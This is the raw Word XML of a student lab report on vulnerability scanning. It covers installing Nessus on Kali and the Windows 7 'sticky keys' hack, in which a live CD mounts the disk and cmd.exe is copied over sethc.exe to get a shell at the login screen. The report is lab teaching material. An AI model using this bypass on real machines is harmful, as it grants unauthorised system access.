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tabs>
          <w:tab w:val="left" w:leader="none" w:pos="0"/>
          <w:tab w:val="left" w:leader="none" w:pos="0"/>
          <w:tab w:val="left" w:leader="none" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="120" w:before="12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top w:color="000000" w:space="3" w:sz="6" w:val="single"/>
          <w:left w:color="000000" w:space="3" w:sz="6" w:val="single"/>
          <w:bottom w:color="000000" w:space="3" w:sz="6" w:val="single"/>
          <w:right w:color="000000" w:space="3" w:sz="6" w:val="single"/>
        </w:pBdr>
        <w:ind w:left="1152" w:right="1152" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3</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Vulnerability Scanning and System Hacking (W</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">indows)</w:t>
      </w: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left="0" w:right="-508" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Student Name:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adwait Purao</w:t>
        <w:tab/>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sem:  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Date: 31/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3/24</w: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Vulnerability scanning, identifying the vulnerability and exploiting </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="420"/>
          <w:tab w:val="left" w:leader="none" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="420" w:right="0" w:hanging="4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tabs>
          <w:tab w:val="left" w:leader="none" w:pos="420"/>
          <w:tab w:val="left" w:leader="none" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="420" w:right="0" w:hanging="420"/>
        <w:jc w:val="left"/>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Outcomes:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="420"/>
          <w:tab w:val="left" w:leader="none" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> To explore various vulnerability scanning mechanisms.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="420"/>
          <w:tab w:val="left" w:leader="none" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> To identify  and interpret the vulnerability</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="420"/>
          <w:tab w:val="left" w:leader="none" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> To find and exploit identified vulnerable service.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="420"/>
          <w:tab w:val="left" w:leader="none" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="720" w:right="0" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  To use the exploit database to understand vulnerability risk</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="1"/>
        <w:jc w:val="center"/>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0E">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="1"/>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b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Procedure:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 1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Ne</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssus</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Vulnerability Scanning using Nessus Scanning tool in KALI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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Register for an activation code-</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https://www.tenable.com/products/nessus/nessus-essentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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Install Nessus Home edition </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">from the Internet in Kali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w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.tenable.com/downloads/nessus?loginAttempted=true</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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Select platform - Nessus-10.7.0 Debian10 amd 64.deb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open terminal -</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 dpkg -i Nessus-10.7.0-debian10_amd64.deb</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 service nessusd status</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 service nessusd start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browser in kali</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r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://127.0.0.1:8834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Give advance permission, allow access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Registration by adding activation key received in your email account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Basic Scan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31200" cy="29718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31200" cy="12319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31200" cy="27305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Short Analysis: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B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Part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color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hack</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ing W</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">indows </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7 using sticky key vulnerability </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">i. Boot win7 using live bootable CD using ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="454660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color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ii.Find the suitable drive containing the windows system folders using  command </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">fdisk -l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="42037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color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">iii. Mount the directive to the newly created drive specifying the type of file system using</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">#mkdir   /mnt/cdrive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">            #mount    -t   ntfs    /dev/sda1   /mnt/cdrive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">            #mount    -t   ntfs    /dev/sda2    /mnt/cdrive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="177800"/>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color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">iv. Replace the sethc.exe file with cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">       #cd    /mnt/cdrive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">       #ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">       #cd Windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">       #cd System32</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">       #cp sethc.exe sethcback.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">       #cp cmd.exe sethc.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">      #reboot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="444444"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="10414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color w:val="444444"/>
